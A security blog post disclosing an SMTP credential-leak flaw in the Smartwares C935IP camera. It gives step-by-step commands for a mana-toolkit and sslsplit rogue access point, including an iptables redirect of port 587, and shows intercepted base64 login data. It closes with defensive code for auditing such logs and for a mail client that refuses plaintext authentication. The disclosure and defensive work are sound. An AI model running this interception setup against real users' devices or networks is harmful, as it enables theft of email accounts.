Detecting the Smartwares C935IP SSL Vulnerability
Author: Mathis Hagen
Date: 2017-05-24 13:44:37
In this article we are going to have a look at how we found the vulnerability in the Smartwares C935IP camera. The camera's email functionality was vulnerable to a MITM attack using sslstrip, as described in our short report. The vulnerability can lead to the compromise of the targeted email account. We will explain how we set up a host machine as an access point (AP) and how to set up the mana-toolkit, our tool of choice in this case. Our goal is an AP with an active Internet connection and sslsplit/sslstrip running.
Obviously this works best with Linux, so we are going to assume a Linux system with the APT package manager. We assume further that our host system has an active Internet connection via WiFi/LAN. It is probably helpful to use an external WiFi card for hosting the AP; we, as well as SensePost, recommend the TL-WN722N USB card, mainly because it is cheap and supports packet injection. The next step is the installation of the needed software. As mentioned earlier, we are going to use the mana-toolkit. It is a toolkit created by SensePost and presented at DEF CON 22 which is great at setting up rogue APs or, in our case, setting up an AP with sslsplit, sslstrip, firelamb and net-creds almost out of the box. If you are using Kali you can install it from the repositories via
sudo apt install mana-toolkit
Otherwise you have to build it from git. We are going to do this on Ubuntu 16.04.2 and install it under /opt/mana by changing to /opt and checking out the repository.
cd /opt
git clone --depth 1 https://github.com/sensepost/mana
cd mana
git submodule init
git submodule update
Afterwards we should have all the files we need. But before we run make we have to install some dependencies. We could use the Ubuntu install script, but it won't work. We can install the needed packages via apt with
sudo apt update
sudo apt install libnl-genl-3-dev dnsmasq tinyproxy libssl-dev apache2 macchanger python-dnspython python-pcapy dsniff stunnel4 python-scapy libevent-dev make
Now we can install the mana-toolkit with
make
sudo make install
We could use the toolkit now, but first we want to install sslsplit from GitHub because it has an experimental feature we need. To do so we clone the sslsplit git repository and run make like this:
git clone https://github.com/droe/sslsplit
cd sslsplit
make
sudo make install
After installing sslsplit we are going to have a look at the mana-toolkit start script we will use later. It is located at /opt/mana/run-mana/start-nat-full.sh. There are a couple of other scripts, but for now we will stick with start-nat-full.sh. This script starts a NATed AP with the full functionality of the mana-toolkit. We need to change a couple of things now.
- Modify /opt/mana/run-mana/start-nat-full.sh
  - Change the upstream variable to the name of the interface with an active Internet connection.
  - Change the phy variable to the name of the interface that should host the AP.
  - Modify the sslsplit section:
    - add "autossl 0.0.0.0 10587 \" to the first block.
    - add "iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 587 -j REDIRECT --to-port 10587" to the second.
- Modify /etc/mana-toolkit/hostapd-mana.conf
  - To set a password for your AP, add the following to the first block:
    - wpa_pairwise=TKIP CCMP
  - To disable the actual mana feature, set "enable_mana=0".
  - You may also make the AP hidden by changing "ignore_broadcast_ssid".
Now we are good to go.
After configuring our setup it is time to use it. The first thing to do is to start our AP using the modified start-nat-full.sh script.
The next thing to do is to connect the smartphone (with the OMGuard HD app) and the camera to our AP and also connect them to each other. Then you have to enable the alert email tick box in the camera's settings and enter your account information in the advanced settings tab. If you decide to use e.g. a Gmail account you can enable SSL, but it is not necessary or important since we can attack both SSL and STARTTLS. As soon as you trigger the alert now, via audio or motion, an email will be sent from the account you specified, and sslsplit will intercept and log the communication with the mail server. The logs are located under /var/lib/mana-toolkit. They should contain a passage similar to this:
220 smtp.gmail.com ESMTP o22sm6089025wro.13 - gsmtp
250-smtp.gmail.com at your service, [220.127.116.11]
250-AUTH LOGIN PLAIN XOAUTH2 PLAIN-CLIENTTOKEN OAUTHBEARER XOAUTH
AUTH LOGIN dXNlcm5hbWVAZ21haWwuY29tCg== (username@gmail.com base64 encoded)
cGFzc3dvcmQK (password base64 encoded)
235 2.7.0 Accepted
.
250 2.0.0 OK 1490279709 o22sm6089025wro.13 - gsmtp
QUIT
221 2.0.0 closing connection o22sm6089025wro.13 - gsmtp
Now we just need to decode the base64-encoded username and password and we have full access to the account.
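The log excerpt above is also what a defender wants to search for: an AUTH LOGIN or AUTH PLAIN exchange with no STARTTLS upgrade in front of it means the device handed its mail password to whoever sat on the path. The script below is an added example, not code from this article or from the mana-toolkit: it walks an interleaved client/server SMTP log of the kind sslsplit writes, records every AUTH exchange, and flags the ones that happened in the clear. The two sample sessions, the hostnames, session IDs and credentials are constructed for the example (the base64 values mirror the ones in the excerpt); it reports the affected username so the account can be rotated, but never keeps or prints the password itself.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()

# Constructed sample sessions in the style of the sslsplit excerpt above (hostnames,
# session IDs and credentials are made up). Session 1: AUTH LOGIN with no prior
# STARTTLS, i.e. the credentials travel in the clear.
PLAINTEXT_SESSION = "\n".join([
    "220 smtp.example.invalid ESMTP abc123 - esmtp",
    "250-smtp.example.invalid at your service, [192.0.2.10]",
    "250 AUTH LOGIN PLAIN XOAUTH2",
    "AUTH LOGIN " + _b64("username@gmail.com\n"),
    "334 UGFzc3dvcmQ6",
    _b64("password\n"),
    "235 2.7.0 Accepted",
])
# Session 2: the client upgrades to TLS first and only then authenticates.
STARTTLS_SESSION = "\n".join([
    "220 smtp.example.invalid ESMTP abc124 - esmtp",
    "250 STARTTLS",
    "STARTTLS",
    "220 2.0.0 Ready to start TLS",
    "250 AUTH LOGIN PLAIN",
    "AUTH PLAIN " + _b64("\0user@example.invalid\0secret"),
    "235 2.7.0 Accepted",
])
SERVER_LINE = re.compile(r"^\d{3}[ -]")  # server replies: 3-digit code, then ' ' or '-'

@dataclass
class AuthEvent:
    line_no: int                     # log line of the AUTH command
    mechanism: str                   # LOGIN or PLAIN
    username: str                    # decoded, so the account can be rotated
    password_length: int             # the password itself is never kept
    over_tls: bool                   # a STARTTLS upgrade preceded the AUTH
    accepted: Optional[bool] = None  # from the server's 235/535 reply

def _decode(token: str) -> bytes:
    """Base64-decode a SASL token; invalid base64 yields b'' instead of an error."""
    try:
        return base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return b""

def _text(raw: bytes) -> str:
    return raw.decode("utf-8", "replace").rstrip("\r\n")

def _consume(event: AuthEvent, token: str, expecting: str) -> Optional[str]:
    """Apply one client token to the pending AUTH; return what to expect next."""
    if expecting == "login_user":
        event.username = _text(_decode(token))
        return "login_pass"
    if expecting == "login_pass":
        event.password_length = len(_text(_decode(token)))
    else:  # AUTH PLAIN: authzid NUL authcid NUL password in a single token
        parts = _decode(token).split(b"\0")
        if len(parts) == 3:
            event.username, event.password_length = _text(parts[1]), len(parts[2])
    return None

def audit_smtp_log(text: str) -> List[AuthEvent]:
    """Walk an interleaved client/server SMTP log and record every AUTH exchange."""
    events: List[AuthEvent] = []
    tls_active = starttls_pending = False
    expecting: Optional[str] = None  # login_user | login_pass | plain
    current: Optional[AuthEvent] = None
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if SERVER_LINE.match(line):
            code = int(line[:3])
            if starttls_pending:  # the server's answer to STARTTLS
                tls_active, starttls_pending = code == 220, False
            if current is not None and code in (235, 535):
                current.accepted = code == 235
                current = expecting = None
            continue
        parts = line.split(None, 2)  # an optional initial response is parts[2]
        if line.upper() == "STARTTLS":
            starttls_pending = True
        elif line.upper().startswith(("AUTH LOGIN", "AUTH PLAIN")):
            current = AuthEvent(line_no, parts[1].upper(), "", 0, tls_active)
            events.append(current)
            expecting = "plain" if current.mechanism == "PLAIN" else "login_user"
            if len(parts) == 3:
                expecting = _consume(current, parts[2], expecting)
        elif expecting and current is not None:
            expecting = _consume(current, line, expecting)
    return events

def exposed_credentials(text: str) -> List[AuthEvent]:
    """Only the AUTH exchanges that no STARTTLS upgrade protected."""
    return [e for e in audit_smtp_log(text) if not e.over_tls]
```

Running exposed_credentials(PLAINTEXT_SESSION) yields one event for username@gmail.com with an 8-character password that the server accepted, while the STARTTLS session yields none. Note the limit of this check: it only catches credentials sent before any TLS upgrade. A client that does upgrade but accepts sslsplit's forged certificate is still compromised, and that case has to be tested separately by checking whether the device validates the server certificate.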
Although, or rather because, this is a very simple test, it is worth having available: it provides a fast and easy way to test devices for possible vulnerabilities in their SSL/TLS implementations.
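What the camera should have done is the mirror image of the attack: never send AUTH until a TLS session with a verified certificate is in place, and treat a missing STARTTLS offer as an error rather than a reason to fall back to plaintext. The following is an added example of that policy written with Python's standard smtplib, not code from the camera, the OMGuard app or this article; send_alert, build_tls_context and starttls_offered are names chosen here, and the mail server, port and credentials are parameters the caller supplies. The same rules apply to an embedded C client, only the library calls differ.

```python
import smtplib
import ssl
from email.message import EmailMessage


def build_tls_context() -> ssl.SSLContext:
    """Certificate chain and hostname are verified; anything below TLS 1.2 is refused."""
    ctx = ssl.create_default_context()        # CERT_REQUIRED and check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def starttls_offered(esmtp_features: dict) -> bool:
    """smtplib lowercases the EHLO keywords it collects, so look for 'starttls'."""
    return "starttls" in esmtp_features


def send_alert(host: str, port: int, username: str, password: str,
               recipient: str, body: str, implicit_tls: bool = False) -> None:
    """Send one alert mail; credentials are only ever sent inside a verified TLS session."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = username, recipient, "Camera alert"
    msg.set_content(body)
    ctx = build_tls_context()
    if implicit_tls:                           # SMTPS (usually port 465): TLS from byte one
        smtp = smtplib.SMTP_SSL(host, port, context=ctx)
    else:                                      # submission (port 587): upgrade via STARTTLS
        smtp = smtplib.SMTP(host, port)
        smtp.ehlo()
        if not starttls_offered(smtp.esmtp_features):
            smtp.quit()
            # A missing STARTTLS offer is exactly what a stripping attack looks like
            # from the client's side: abort instead of falling back to plaintext AUTH.
            raise RuntimeError("server did not offer STARTTLS; refusing plaintext AUTH")
        smtp.starttls(context=ctx)             # fails closed on a forged or mismatched certificate
        smtp.ehlo()                            # EHLO again: the feature list resets after STARTTLS
    with smtp:
        smtp.login(username, password)         # AUTH now travels only inside TLS
        smtp.send_message(msg)
```

With this client, the sslsplit setup described above produces no usable log entry: the stripped STARTTLS offer makes the client abort, and if STARTTLS is left in place, the forged certificate makes starttls() raise before login() is ever reached.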